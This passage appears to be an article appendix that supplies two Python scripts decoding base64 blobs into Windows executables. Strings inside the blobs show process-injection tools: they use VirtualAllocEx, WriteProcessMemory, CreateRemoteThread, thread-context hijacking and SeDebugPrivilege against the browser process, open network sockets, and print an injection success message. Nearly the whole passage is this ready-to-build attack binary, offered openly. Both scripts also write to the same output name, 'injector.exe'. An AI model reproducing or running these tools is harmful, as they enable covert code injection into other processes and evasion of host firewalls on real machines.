+everyone who is unable to get the Assembler I used. Actually, the
+files below are python scripts that will decode the base64 -
+encoded versions of the executables and create the respective
+binary file in its current directory. If you do not use python,
+you will have to find another way to decode them properly.
+
+
+############################# injector.py #############################
+
+from base64 import decodestring
+open("injector.exe","wb").write(decodestring("""
+TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
+aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB86B1FOIlzFjiJcxY4iXMWtpZgFiCJcxbEqWEWOY
+lzFlJpY2g4iXMWAAAAAAAAAABQRQAATAEDAO9yckAAAAAAAAAAAOAADwELAQUMAAoAAAAG
+AAAAAAAAABAAAAAQAAAAIAAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABAAAAABA
+AAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAEwgAABQAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAATAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAC50ZXh0AAAAzgkAAAAQAAAACgAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAC
+wCAAAAIAAAAAQAAAAOAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAABCAQAAADAAAAACAAAA
+EgAAAAAAAAAAAAAAAAAAQAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGg2MEAAaBowQABoAAAAgOiiCQAAg/gAdSto
+PjFAAGg6MEAAUP81NjBAAOiNCQAA/zU2MEAA6HYJAABoOjBAAOgHAAAAagDoNQkAAFWL7I
+PEnI1FvFDoMgkAAGbHRewAAI1FrFCNRbxQagBqAGoAagBqAGoA/3UIagDo9ggAAIP4AA+E
+xAAAAGgQJwAA/3Ws6DQJAACD+AAPha4AAACLXayLTbC6BwgAAGpAaAAQAABSagBT6OAIAA
+CD+AAPhKIAAACJRZy6BwgAAGoAUmhnEUAA/3WcU+jQCAAAg/gAdFyNRaRQagD/dZz/dZxq
+AGoAU+iFCAAAg/gAdDmJRaDHRagAAAAAav//daDolggAAI1FqFD/daDobAgAAIN9qAB1E2
+oQaBIwQABoADBAAGoA6I8IAAD/daDoMwgAAGgAgAAAagD/dZxT6FMIAABqAFPoPwgAAP91
+sOgTCAAA/3Ws6AsIAADJwgQAVYvsg8S86RUFAABHZXRNb2R1bGVIYW5kbGVBAExvYWRMaW
+JyYXJ5QQBGcmVlTGlicmFyeQBVU0VSMzIuRExMAE1lc3NhZ2VCb3hBAEdldExhc3RFcnJv
+cgBXU0FHZXRMYXN0RXJyb3IAd3MyXzMyLmRsbABXU0FTdGFydHVwAFdTQUNsZWFudXAAc2
+9ja2V0AGNvbm5lY3QAc2VuZAByZWN2AGNsb3Nlc29ja2V0AAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAgAAUEU37gYAAAAAAAAAAFNldFVwIENvbXBsZXRlAEluamVjdG9y
+IFNldFVwIGNvbXBsZXRlLiBTZW5kaW5nIHJlcXVlc3Q6DQoNCkdFVCAvIEhUVFAvMS4wDQ
+pIb3N0OiB3d3cucGhyYWNrLm9yZw0KDQoASW5qZWN0aW9uIHN1Y2Nlc3NmdWwAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAGShMAAAAIXAeAyLQAyLcByti0AI6wmLQDSNQHyLQDyJRfzH
+RfAAAAAAx0X0AAAAAMdF0AAAAADHRdgAAAAAA0A8i0B4A0X8iUX4i0AgA0X8iwgDTfy4AA
+AAAOsBQLsAAAAAi9PB4wXB6hsL2roAAAAAihED2kGKEYP6AHXlUCtF9GvABEGLVfiLUhwD
+VfyLFBADVfyJVfA70XUD/0X0WIH7kFXJmXW1i1UIgcILAAAAUv91/P9V8IP4AA+EBwIAAI
+lF7ItVCIHCHAAAAFL/dfz/VfCD+AAPhOsBAACJReiLVQiBwikAAABS/3X8/1Xwg/gAD4TP
+AQAAiUXki1UIgcI1AAAAUv9V7IP4AA+EtgEAAIlF3ItVCIHCaQAAAFL/VeiD+AAPhJ0BAA
+CJRdiLVQiBwkAAAABS/3Xc/1Xwg/gAD4SBAQAAiUXgi1UIgcJ0AAAAUv912P9V8IP4AA+E
+ZQEAAIlF1ItVCIHCfwAAAFL/ddj/VfCD+AAPhEkBAACJRdCLVQiBwooAAABS/3XY/1Xwg/
+gAD4QtAQAAiUXMi1UIgcKRAAAAUv912P9V8IP4AA+EEQEAAIlFyItVCIHCmQAAAFL/ddj/
+VfCD+AAPhPUAAACJRcSLVQiBwp4AAABS/3XY/1Xwg/gAD4TZAAAAiUXAi1UIgcKjAAAAUv
+912P9V8IP4AA+EvQAAAIlFvItVCIHCrwAAAFJqAv9V1IP4AA+FogAAAGoAagFqAv9VzIP4
+/w+EkAAAAIvYahCLVQiBwj0CAABSU/9VyIP4/3R5agBqKItVCIHCiQIAAFJT/1XEg/j/dG
+K5AAAAAItVCIHCxwIAAAPRUlFqAGoBUlP/VcBZWjwBdRmD+QJ4C4oCOkL+dQQ8CnQJQYH5
+WAIAAHXLU/9VvGpAi1UIgcKyAgAAUotVCIHCxwIAAFJqAP9V4OsAuAEAAADrBbgAAAAAUI
+N90AB0D/9V0IN92AB0Bv912P9V5FjJwgQA/yUkIEAA/yUsIEAA/yUcIEAA/yUYIEAA/yUo
+IEAA/yUQIEAA/yUUIEAA/yU0IEAA/yUwIEAA/yUgIEAA/yU4IEAA/yUIIEAA/yUEIEAA/y
+UAIEAA/yVAIEAA/yVEIEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAADeIQAA0CEAAMIhAAAAAAAAQCEAAFIhAAAeIQAACCEAAIghAADoIA
+AALCEAAPYgAAB4IQAAZiEAAJ4hAAAAAAAA/iEAAAwiAAAAAAAArCAAAAAAAAAAAAAAtCEA
+ABAgAACcIAAAAAAAAAAAAADwIQAAACAAANwgAAAAAAAAAAAAACAiAABAIAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAADeIQAA0CEAAMIhAAAAAAAAQCEAAFIhAAAeIQAACCEAAIghAADoIAAA
+LCEAAPYgAAB4IQAAZiEAAJ4hAAAAAAAA/iEAAAwiAAAAAAAAGgBDbG9zZUhhbmRsZQBAAE
+NyZWF0ZVByb2Nlc3NBAABCAENyZWF0ZVJlbW90ZVRocmVhZAAAgABFeGl0UHJvY2VzcwDv
+AEdldEV4aXRDb2RlVGhyZWFkADIBR2V0U3RhcnR1cEluZm9BAGgCVGVybWluYXRlUHJvY2
+VzcwAAggJWaXJ0dWFsQWxsb2NFeAAAhAJWaXJ0dWFsRnJlZUV4AI8CV2FpdEZvclNpbmds
+ZU9iamVjdACnAldyaXRlUHJvY2Vzc01lbW9yeQAAa2VybmVsMzIuZGxsAACAAVJlZ0Nsb3
+NlS2V5AJgBUmVnT3BlbktleUEAogFSZWdRdWVyeVZhbHVlQQAAYWR2YXBpMzIuZGxsAACd
+AU1lc3NhZ2VCb3hBAFkCV2FpdEZvcklucHV0SWRsZQAAdXNlcjMyLmRsbAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASW5qZWN0aW9uIGZh
+aWxlZC4ARmFpbHVyZQBodG1sZmlsZVxzaGVsbFxvcGVuXGNvbW1hbmQAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAEAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=""")
+
+
+############################### tiny.py ###############################
+
+from base64 import decodestring
+open("injector.exe","wb").write(decodestring("""
+TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
+aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAC4XBZb/D14CPw9eAj8PXgIciJrCOI9eAgAHWoI/T
+14CFJpY2j8PXgIAAAAAAAAAAAAAAAAAAAAAFBFAABMAQMAZ3NyQAAAAAAAAAAA4AAPAQsB
+BQwADgAAAAYAAAAAAAAAEAAAABAAAAAgAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAA
+AAAEAAAAAEAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbCAA
+ADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAABsAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAALnRleHQAAACIDAAAABAAAAAOAAAABAAAAAAAAAAAAAAAAAAAIAAAYC
+5yZGF0YQAA6gIAAAAgAAAABAAAABIAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAADsAAAAA
+MAAAAAIAAAAWAAAAAAAAAAAAAAAAAABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOhKCgAAagDo+AsAAFWL7IPE5I1F5FBoDTBA
+AGoA6FoMAACD+AB0U8dF7AEAAADHRfgCAAAAi0XkiUXwi0XoiUX06MQLAACLyI1F/FBqIF
+HoLgwAAItN/IP5AHQeagBqAGoAjUXsUGoAUegIDAAAi8j/dfzoegsAAIvBycNVi+yBxLj+
+///Hhdj+//8oAQAAx4W8/v//HAAAAOhu////agBqBuhXCwAAiYW4/v//jYXY/v//UP+1uP
+7//+hjCwAAg/gAD4TBAAAAjZX8/v//aAAwQABS6JcLAACD+AB0HY2F2P7//1D/tbj+///o
+OAsAAIP4AA+EkAAAAOvNjYW8/v//UP+1uP7//+g/CwAAuwAAAACLlcj+//87leD+//90GY
+2FvP7//1D/tbj+///oIAsAAIP4AHRS69mLVQiLheD+//+JQgiLhcT+//+JQgxS/7Xg/v//
+agBo/w8fAOi1CgAAg/gAdCOL2P+1xP7//2oAaP8DHwDoogoAAIP4AHQKWokaiUIEagHrAm
+oAg724/v//AHQL/7W4/v//6FMKAABYycIEAFWL7IPEsOk7BQAAR2V0TW9kdWxlSGFuZGxl
+QQBMb2FkTGlicmFyeUEARnJlZUxpYnJhcnkAT3BlbkV2ZW50QQBDbG9zZUhhbmRsZQBTZX
+RFdmVudABUSU5ZMABVU0VSMzIuRExMAE1lc3NhZ2VCb3hBAEdldExhc3RFcnJvcgBXU0FH
+ZXRMYXN0RXJyb3IAd3MyXzMyLmRsbABXU0FTdGFydHVwAFdTQUNsZWFudXAAc29ja2V0AG
+Nvbm5lY3QAc2VuZAByZWN2AGNsb3Nlc29ja2V0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAgAAUEU37gYAAAAAAAAAAFNldFVwIENvbXBsZXRlAEluamVjdG9yIFNldFVw
+IGNvbXBsZXRlLiBTZW5kaW5nIHJlcXVlc3Q6DQoNCkdFVCAvIEhUVFAvMS4wDQpIb3N0Oi
+B3d3cucGhyYWNrLm9yZw0KDQoASW5qZWN0aW9uIHN1Y2Nlc3NmdWwAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+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
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCIAALAiAACYIgAA
+AAAAAHAhAACEIQAAkiEAAFwhAACgIQAAsiEAAMIhAADSIQAAIiEAAE4hAAD+IQAAECIAAC
+AiAAAwIgAAQiIAAFIiAABoIgAAfiIAADIhAADmIQAAFCEAAO4hAAAAAAAAuCAAAAAAAAAA
+AAAAiiIAABAgAACoIAAAAAAAAAAAAADcIgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyC
+IAALAiAACYIgAAAAAAAHAhAACEIQAAkiEAAFwhAACgIQAAsiEAAMIhAADSIQAAIiEAAE4h
+AAD+IQAAECIAACAiAAAwIgAAQiIAAFIiAABoIgAAfiIAADIhAADmIQAAFCEAAO4hAAAAAA
+AAGgBDbG9zZUhhbmRsZQAtAENyZWF0ZUV2ZW50QQAASQBDcmVhdGVUb29saGVscDMyU25h
+cHNob3QAAIAARXhpdFByb2Nlc3MA2wBHZXRDdXJyZW50UHJvY2VzcwBMAUdldFRocmVhZE
+NvbnRleHQAANEBT3BlblByb2Nlc3MA1AFPcGVuVGhyZWFkAADeAVByb2Nlc3MzMkZpcnN0
+AADgAVByb2Nlc3MzMk5leHQABwJSZXN1bWVUaHJlYWQAAE8CU2V0VGhyZWFkQ29udGV4dA
+AAYAJTbGVlcABiAlN1c3BlbmRUaHJlYWQAaQJUZXJtaW5hdGVUaHJlYWQAagJUaHJlYWQz
+MkZpcnN0AGsCVGhyZWFkMzJOZXh0AACCAlZpcnR1YWxBbGxvY0V4AACEAlZpcnR1YWxGcm
+VlRXgAjwJXYWl0Rm9yU2luZ2xlT2JqZWN0AKcCV3JpdGVQcm9jZXNzTWVtb3J5AAC5Amxz
+dHJjbXBpQQBrZXJuZWwzMi5kbGwAABkAQWRqdXN0VG9rZW5Qcml2aWxlZ2VzABQBTG9va3
+VwUHJpdmlsZWdlVmFsdWVBAGMBT3BlblByb2Nlc3NUb2tlbgAAYWR2YXBpMzIuZGxsAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAElFWFBMT1JFLkVYRQBTZURlYnVnUHJpdmlsZWdlAFRJTlkwAAAA
+AABgnGgAAAAA6AcAAACdYekAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
